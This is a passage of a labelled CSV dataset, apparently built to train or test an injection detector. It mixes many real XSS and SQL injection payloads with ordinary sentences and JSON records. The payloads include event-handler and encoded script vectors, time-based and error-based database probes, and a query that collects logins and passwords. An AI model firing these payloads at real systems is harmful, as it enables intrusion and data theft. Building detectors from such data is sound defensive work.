onmouseleave=""alert(1)"">test</keygen>",1,XSS,6567 Select replace.,3,normal,24763 "-4828'+ ( select qxnw where 9488 = 9488 union all select 9488,9488--",2,SQLi,16414 "1 ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 3038 = 3038",2,SQLi,11196 <data onpointerleave=alert(1)>XSS</data>,1,XSS,7838 They ordered a pepperoni pie.,3,normal,23009 "<button draggable=""true"" ondragleave=""alert(1)"">test</button>",1,XSS,3363 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( 'qomf' like 'qomf",2,SQLi,12990 "1"" ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""msjh"" like ""msjh",2,SQLi,10159 "{""id"":null,""name"":""leg""}",3,normal,26754 ")) AND ELT(1337=1337,SLEEP(5)) AND ((1337"" LIKE ""1337",2,SQLi,18043 "<style>:target {color: red;}</style><h1 id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></h1>",1,XSS,1143 "The facts of the problem would all appear covered by the hypothesis that John the presbyter, the eleven being all dead, wrote the book of Revelation (its more ancient Christian portions) say in 69, and died at Ephesus say in loo; that the author of the Gospel wrote the first draft, here, say in 97; that this book, expanded by him, first circulated within a select Ephesian Christian circle; and that the Ephesian church officials added to it the appendix and published it in 110 -120.",3,normal,25455 "Select McDonalds locations in Scotland, England, and Australia now play Mozart at select hours in an effort to soothe some of their more inebriated customers.",3,normal,25622 1 ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( 1601 = 1601,2,SQLi,15031 "1 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) -- xgyc",2,SQLi,15458 "-3278' ) ) or elt ( 1032 = 1032,3623 ) and ( ( 'zxig' like 'zxig",2,SQLi,16767 "1' union all select null,null,null,null,null,null#",2,SQLi,18478 "<IMG SRC=x ondragenter=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3136 1 SELECT pg_sleep(5);,2,SQLi,21575 "<button onmousemove=""alert(1)"">test</button>",1,XSS,6993 "-3359 union all select 4675,4675,4675--",2,SQLi,19651 "{""id"":null,""firstName"":""Fer"",""lastName"":""Ho"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27034 select name from syscolumns where id = (sele ...,2,SQLi,18650 "select * from users where id = 1 or "".%"" or 1 = 1 -- 1",2,SQLi,17882 "<STYLE>li {list-style-image: url(""javascript:javascript:alert(1)"");}</STYLE><UL><LI>XSS",1,XSS,1825 "-7996"" ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""iuzv"" like ""iuzv",2,SQLi,10105 "<IMG SRC=x onkeypress=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3261 1' ) as eyzk where 2489 = 2489 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10237 <audio id=x tabindex=1 onbeforeactivate=alert(1)></audio>,1,XSS,4022 Perhaps the earliest example is to be found in Select Views of Literature (1811-1812).,3,normal,25787 <col onblur=alert(1) tabindex=1 id=x></col><input autofocus>,1,XSS,3502 "<style><img src=""</style><img src=x onerror=javascript:alert(1)//"">",1,XSS,2660 Where did you find that antique watch?,3,normal,22989 "1%"" ) ) ) union all select null,null,null,null,null,null#",2,SQLi,17538 "1"" ) as cxwd where 5800 = 5800 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13773 "1%"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""%"" = """,2,SQLi,10540 "<html onMouseDown html onMouseDown=""javascript:javascript:alert(1)""></html onMouseDown>",1,XSS,1821 <embed onpointerleave=alert(1)>XSS</embed>,1,XSS,7464 <source id=x tabindex=1 onfocus=alert(1)></source>,1,XSS,5626 1 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) # pkcp,2,SQLi,17839 I'll select chocolate.,3,normal,24798 `'><script>\x7Ejavascript:alert(1)</script>,1,XSS,7067 1 ) as jdhz where 2021 = 2021,2,SQLi,20729 "<p onmouseout=""alert(1)"">test</p>",1,XSS,9345 "1"" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,12360 "<em onbeforepaste=""alert(1)"" contenteditable>test</em>",1,XSS,4671 <svg><div onload=alert(1)></div>,1,XSS,9431 <dt id=x tabindex=1 onbeforeactivate=alert(1)></dt>,1,XSS,5478 "{""id"":null,""firstName"":""Adrian"",""lastName"":""San"",""address"":""Midpoint Orchard #01-08, 220 Orchard Road,"",""city"":""545"",""telephone"":""6464118800""}",3,normal,27400 "select * from users where id = 1 or 1#""@ union select 'a',version ( ) -- 1",2,SQLi,15694 "<style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>//[""'`-->]]>]</div>",1,XSS,1858 <noframes onfocusout=alert(1) tabindex=1 id=x></noframes><input autofocus>,1,XSS,2284 Select the tool (next to the color selection area) and the drawing tool will fill in the color to match whatever area of your photo you select.,3,normal,25581 "end and ( ( ( ""zpii"" like ""zpii",2,SQLi,20417 "1"" ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13416 Join the club.,3,normal,22827 <big id=x tabindex=1 onfocusin=alert(1)></big>,1,XSS,6441 "<li onkeyup=""alert(1)"" contenteditable>test</li>",1,XSS,6033 "<style>@keyframes slidein {}</style><style style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></style>",1,XSS,388 "<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]<![CDATA[cript:javascript:alert(1);"">]]</C><X></xml>",1,XSS,1630 "1' or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11801 The Lovers and the Despot is now playing in select theaters.,3,normal,25419 """ Look for ""The New York Times"" and select ""Enable Skill.",3,normal,26479 1'|| ( select 'tfqg' from dual where 9862 = 9862 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,13875 "<param onmouseout=""alert(1)"">test</param>",1,XSS,7721 "<aside onmousemove=""alert(1)"">test</aside>",1,XSS,7547 "1' ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,11405 "&lt;A HREF=\""http&#58;//1113982867/\""&gt;XSS&lt;/A&gt;",1,XSS,4660 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#",2,SQLi,12521 <tr onpointermove=alert(1)>XSS</tr>,1,XSS,9104 -7659' ) as bowy where 4835 = 4835 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,10082 %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e,1,XSS,1844 """,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,18905 "-6041' ) ) or make_set ( 9835 = 1367,1367 ) and ( ( 'hxjf' = 'hxjf",2,SQLi,16609 Select close.,3,normal,24604 "<center onkeydown=""alert(1)"" contenteditable>test</center>",1,XSS,3870 `'><script>\xE2\x80\x86javascript:alert(533)</script>,1,XSS,5056 "<ins oncut=""alert(1)"" contenteditable>test</ins>",1,XSS,5891 "1%"" ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( ""%"" = """,2,SQLi,14400 "-9922' ) ) union all select 2193,2193,2193--",2,SQLi,19110 "I mean, I'm sure there's a select few that do.",3,normal,26073 "-4686"" ) as dxks where 7123 = 7123 or elt ( 1032 = 1032,3623 ) --",2,SQLi,16739 "<IMG SRC=x onreset=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3810 Careful selection.,3,normal,24789 "<style>:target {color:red;}</style><address id=x style=""transition:color 1s"" ontransitionend=alert(1)></address>",1,XSS,937 "1"" ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""piya"" = ""piya",2,SQLi,10675 "<style>@keyframes x{}</style><em style=""animation-name:x"" onanimationend=""alert(1)""></em>",1,XSS,1776 Select the perfect honeymoon resort.,3,normal,24376 "<image draggable=""true"" ondragstart=""alert(1)"">test</image>",1,XSS,3746 "1 where 5401 = 5401 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,17397 "<b draggable=""true"" ondragenter=""alert(1)"">test</b>",1,XSS,5445 Select your modify.,3,normal,25044 select ( case when ( 9030 = 6952 ) then 1 else 9030* ( select 9030 from master..sysdatabases ) end ) --,2,SQLi,13993 Where's your SQL data?,3,normal,23419 %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E,1,XSS,1877 ") or (1""=""1""#",2,SQLi,22222 "<small draggable=""true"" ondragenter=""alert(1)"">test</small>",1,XSS,3762 Select the relevant year below for a complete list of starred decisions for that year.,3,normal,25588 Join us for a meeting.,3,normal,23000 "<section draggable=""true"" ondragenter=""alert(1)"">test</section>",1,XSS,3054 "1' ) ) union all select null,null#",2,SQLi,20149 "1' ) ) as kxek where 3429 = 3429 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13678 "1' ) where 7007 = 7007 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13170 "{""id"":null,""firstName"":""Lhq"",""lastName"":""Totheq"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27119 "<div draggable=""true"" ondragstart=""alert(1)"">test</div>",1,XSS,4617 "select * from users where id = 1 or $ . = 1 union select 1,@@VERSION -- 1",2,SQLi,15836 "<dialog onbeforecopy=""alert(1)"" contenteditable>test</dialog>",1,XSS,3323 Select your control.,3,normal,24877 Order a chocolate dessert.,3,normal,22672 """ or """" """,2,SQLi,22468 <acronym id=x tabindex=1 onbeforeactivate=alert(1)></acronym>,1,XSS,3313 Select the perfect dress for the event.,3,normal,24231 "You select a unit with the right trigger, select which tile on the map to send it to, specifically to counter invading enemies as they arrive on tiny ships, and viola, you're playing Bad North.",3,normal,25062 Select the best wedding planner.,3,normal,24367 "{""id"":null,""name"":""fight light""}",3,normal,26787 -7041' ) where 6307 = 6307 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12767 "1%' ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( '%' = '",2,SQLi,12895 "1' where 9605 = 9605 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,11619 <ruby onpointermove=alert(1)>XSS</ruby>,1,XSS,8213 "1%"" ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( ""%"" = """,2,SQLi,11455 1'+ ( select wpai where 3685 = 3685,2,SQLi,20036 1'+ ( select eluw where 6210 = 6210,2,SQLi,20037 "1%"" ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ""%"" = """,2,SQLi,17764 "1"" ) where 3679 = 3679",2,SQLi,21417 "select * from users where id = 1 + @`\` union select 1,version ( ) -- 1",2,SQLi,16042 "<style>@keyframes x{}</style><dialog style=""animation-name:x"" onanimationend=""alert(1)""></dialog>",1,XSS,1519 "Ideally, ask someone else to select a small plateful of low-fat food for you.",3,normal,26065 ORDER BY 16--,2,SQLi,22239 "<nobr onkeypress=""alert(1)"" contenteditable>test</nobr>",1,XSS,4494 (SELECT SLEEP(5)),2,SQLi,22085 *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */,1,XSS,3114 "-3852' ) union all select 3577,3577,3577,3577,3577,3577,3577,3577#",2,SQLi,16590 "1' ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ( 'aiuy' = 'aiuy",2,SQLi,16318 "1 ) where 9724 = 9724 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11858 "<div style=""background:url(/f#&#127;oo/;color:red/*/foo.jpg);"">X",1,XSS,2868 "<style>:target {color:red;}</style><optgroup id=x style=""transition:color 1s"" ontransitionend=alert(1)></optgroup>",1,XSS,857 VITAMIN E RAISES PROSTATE CANCER RISK: THE select TRIAL The select trial (the Selenium and Vitamin E Cancer Prevention Trial) was designed to determine the long range effect of selenium and vitamin E supplements on prostate cancer.,3,normal,25187 "<col draggable=""true"" ondragend=""alert(1)"">test</col>",1,XSS,4914 "1' ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,13884 <tt id=x tabindex=1 onbeforeactivate=alert(1)></tt>,1,XSS,5465 1 ) as uhmm where 2304 = 2304 union all select null#,2,SQLi,18208 Join for dinner.,3,normal,22802 "<plaintext onmouseenter=""alert(1)"">test</plaintext>",1,XSS,5484 "1"" ) where 6956 = 6956 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12629 Select your adapt.,3,normal,25042 "1 ) union all select null,null,null,null,null,null#",2,SQLi,18376 "<acronym onpaste=""alert(1)"" contenteditable>test</acronym>",1,XSS,3830 Select trade.,3,normal,24772 "<bdi onbeforecut=""alert(1)"" contenteditable>test</bdi>",1,XSS,4699 "1"" ) where 6859 = 6859 union all select null,null,null,null,null,null,null,null#",2,SQLi,15224 "<wbr draggable=""true"" ondragend=""alert(1)"">test</wbr>",1,XSS,4989 /><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />,1,XSS,4652 "))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337",2,SQLi,17567 Select a flavor for the drink.,3,normal,24168 "1%"" or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17733 "-2323"" ) as zgsn where 9274 = 9274 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --",2,SQLi,10312 1' ) where 4500 = 4500,2,SQLi,21508 "-5591%"" ) ) order by 1--",2,SQLi,21211 "<object onmousedown=""alert(1)"">test</object>",1,XSS,6799 "<pre oncopy=""alert(1)"" contenteditable>test</pre>",1,XSS,5810 "{""id"":null,""name"":""Monferno""}",3,normal,27442 "select * from users where id = 1 or "",#"" or 1 = 1 -- 1",2,SQLi,17863 "<li onkeypress=""alert(1)"" contenteditable>test</li>",1,XSS,5412 <head onpointerout=alert(1)>XSS</head>,1,XSS,8336 "<textarea draggable=""true"" ondragenter=""alert(1)"">test</textarea>",1,XSS,2802 &#x000003c;,1,XSS,9839 "1"" ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""cmhh"" like ""cmhh",2,SQLi,10356 "1 where 5925 = 5925 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12752 It seems that a select few celebrities certainly do not.,3,normal,25958 "1"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""lxue"" like ""lxue",2,SQLi,13802 <IMG SRC=javascript:javascript:alert(1)>,1,XSS,7818 "<output draggable=""true"" ondrag=""alert(1)"">test</output>",1,XSS,4380 <set onpointerout=alert(1)>XSS</set>,1,XSS,8924 "1%"" ) ) and 2006 = 2006",2,SQLi,21290 <input type=checkbox id=x onfocusin=alert(1)>,1,XSS,6719 "-6214"" union all select 3323,3323#",2,SQLi,20144 <optgroup onfocusout=alert(1) tabindex=1 id=x></optgroup><input autofocus>,1,XSS,2263 "<script onmouseup=""alert(1)"">test</script>",1,XSS,7432 "1%"" union all select null,null#",2,SQLi,20414 ><img src=x onerror=alert('XSS');>,1,XSS,9305 "In select cities, you can also order flowers from local stores.",3,normal,25993 "1%"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""%"" = """,2,SQLi,11214 1'|| ( select 'mnvk' from dual where 4181 = 4181,2,SQLi,18802 "select * from users where id = 1 or "" ) ["" or 1 = 1 -- 1",2,SQLi,17593 "<style></style\x20<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,2009 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></iframe>",1,XSS,195 "( extractvalue ( 1759,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1759 = 1759,1 ) ) ) ,0x717a767a71 ) ) )",2,SQLi,13827 "Melody tones This allows you to select from a range of pre-set options, which ringing tone your phone will operate with.",3,normal,25885 "#""><img src=M onerror=alert('XSS');>",1,XSS,8773 "-2314"" ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ""uatq"" like ""uatq",2,SQLi,16324 1 and 6802 = 3592--,2,SQLi,21940 "<style>:target {color: red;}</style><section id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></section>",1,XSS,773 "1' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 'fvbv' = 'fvbv",2,SQLi,10611 select * from users where id = '1' <@&1 or 1 = 1 -- 1',2,SQLi,17886 select * from users where id = 1 +$+. or 1 = 1 -- 1,2,SQLi,18254 "1 ) as cejp where 4736 = 4736 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12490 "1%' ) union all select null,null--",2,SQLi,20148 Select store.,3,normal,24552 "1"" ) ) as yfpl where 4820 = 4820 union all select null,null,null,null,null,null,null--",2,SQLi,14892 "1"" where 4213 = 4213 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14591 "-4797' union all select 8223,8223,8223,8223,8223,8223,8223,8223#",2,SQLi,16813 "{""id"":null,""firstName"":""Shuping"",""lastName"":""Lim"",""address"":""12 EAST COAST ROAD 03-11 KATONG MALL"",""city"":""172"",""telephone"":""2356212845""}",3,normal,27002 "{""id"":null,""firstName"":""Wanni"",""lastName"":""Seat"",""address"":""4 Jalan Besut"",""city"":""746"",""telephone"":""4738226219""}",3,normal,27231 "1'+ ( select bptu where 7356 = 7356 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) ) +'",2,SQLi,10112 "1"" ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,16934 <textarea onpointerout=alert(1)>XSS</textarea>,1,XSS,6319 "1"" or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,11875 <listing onpointerover=alert(1)>XSS</listing>,1,XSS,6584 "<;XML ID="";xss"";>;<;I>;<;B>;<;IMG SRC="";javas<;!-- -->;cript:alert(';XSS';)"";>;<;/B>;<;/I>;<;/XML>;",1,XSS,1449 "<style>@keyframes slidein {}</style><section style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></section>",1,XSS,344 He ordered a meal from his favorite restaurant.,3,normal,23894 "1' ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13343 "1"" ) as pydh where 3407 = 3407 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11352 "select * from users where id = 1 or "" ( ,"" = 1 or 1 = 1 -- 1",2,SQLi,17135 "-5560"" ) ) or 7292 = 6184#",2,SQLi,20991 <<SCRIPT>alert(“XSS”);//<</SCRIPT>,1,XSS,9171 How to select the right startup incubator in 9 steps,3,normal,26079 "1"" and 4996 = 4431 and ""jzaq"" = ""jzaq",2,SQLi,19924 <tbody onpointerleave=alert(1)>XSS</tbody>,1,XSS,7371 "<picture><source srcset=""validimage.png""><image onloadstart=alert(1)></picture>",1,XSS,2046 <dialog onpointermove=alert(1)>XSS</dialog>,1,XSS,7159 "1%"" ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16312 "<link onmouseover=""alert(1)"">test</link>",1,XSS,7854 "-9959"" ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""vcwc"" = ""vcwc",2,SQLi,10202 "1' or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12156 select ( case when ( 5856 = 7176 ) then 5856 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13639 "1 ) and make_set ( 4593 = 7765,7765 ) and ( 8517 = 8517",2,SQLi,17756 "1%"" ) ) ) and make_set ( 8191 = 7813,7813 ) and ( ( ( ""%"" = """,2,SQLi,17068 "<style>@keyframes x{}</style><output style=""animation-name:x"" onanimationstart=""alert(1)""></output>",1,XSS,1494 "<style>:target {color: red;}</style><caption id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></caption>",1,XSS,780 "UNION ALL SELECT 1,2#",2,SQLi,21569 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*",2,SQLi,9889 -8878' in boolean mode ) union all select 7785#,2,SQLi,18887 "<img onclick=""alert(1)"">test</img>",1,XSS,9280 <th id=x tabindex=1 onbeforedeactivate=alert(1)></th><input autofocus>,1,XSS,2526 Where's the batting cage?,3,normal,23609 "1%"" ) ) and 4595 = 4595#",2,SQLi,21205 "<? echo('<SCR)'; echo('IPT>alert("""")</SCRIPT>'); ?>",1,XSS,5376 "1 ) ) union all select null,null,null--",2,SQLi,19606 "admin"" or 1 = 1#",2,SQLi,22133 France is leading the process to select a European candidate.,3,normal,26169 "select * from users where id = 1 <@.$ union select 1,version ( ) -- 1",2,SQLi,16256 "1'|| ( select 'ativ' from dual where 4746 = 4746 union all select null,null,null,null#",2,SQLi,14873 "1"" ) ) and elt ( 6553 = 4771,4771 ) and ( ( ""eolu"" = ""eolu",2,SQLi,17395 "<base ondblclick=""alert(1)"">test</base>",1,XSS,8262 Select change.,3,normal,24614 "<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>",1,XSS,42 "1 ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 2303 = 2303",2,SQLi,11264 1' ) ) as kdse where 6767 = 6767 rlike sleep ( 5 ) #,2,SQLi,18170 Select your substitute.,3,normal,25051 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ""%"" = """,2,SQLi,14448 "1%"" ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ""%"" = """,2,SQLi,11663 <sup id=x tabindex=1 onfocus=alert(1)></sup>,1,XSS,6819 Select the right angle for the photo.,3,normal,24079 "Now, select salad.",3,normal,24791 "1' ) where 6056 = 6056 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,10728 "1"" ) ) union all select null,null,null,null#",2,SQLi,19131 "1 ) where 1513 = 1513 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14164 "<style>@keyframes x{}</style><strong style=""animation-name:x"" onanimationstart=""alert(1)""></strong>",1,XSS,1462 The platform will be available in other select markets in 2016.,3,normal,25400 "<big onbeforecopy=""alert(1)"" contenteditable>test</big>",1,XSS,4495 Where's the planetarium?,3,normal,23581 Select a fragrance for the perfume.,3,normal,24072 ", begin declare @var varchar ( 8000 ) set @var = ':' select @var = @var+'+login+'/'+password+' ' from users where login >",2,SQLi,13098 "select * from users where id = 1 or ""%;"" or 1 = 1 -- 1",2,SQLi,17939 ( select 2412 = ( 'qqpjq'|| ( select case 2412 when 2412 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ),2,SQLi,13710 "-1487"" ) as crfi where 2407 = 2407 union all select 2407,2407,2407,2407,2407,2407,2407,2407,2407,2407--",2,SQLi,13971 "1 where 5332 = 5332 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,11026 "1' ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( 'seyd' = 'seyd",2,SQLi,15456 <spacer onpointermove=alert(1)>XSS</spacer>,1,XSS,7233 "select * from users where id = '1' + @ 1! union select 1,version ( ) -- 1'",2,SQLi,15710 -3540 where 7302 = 7302 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 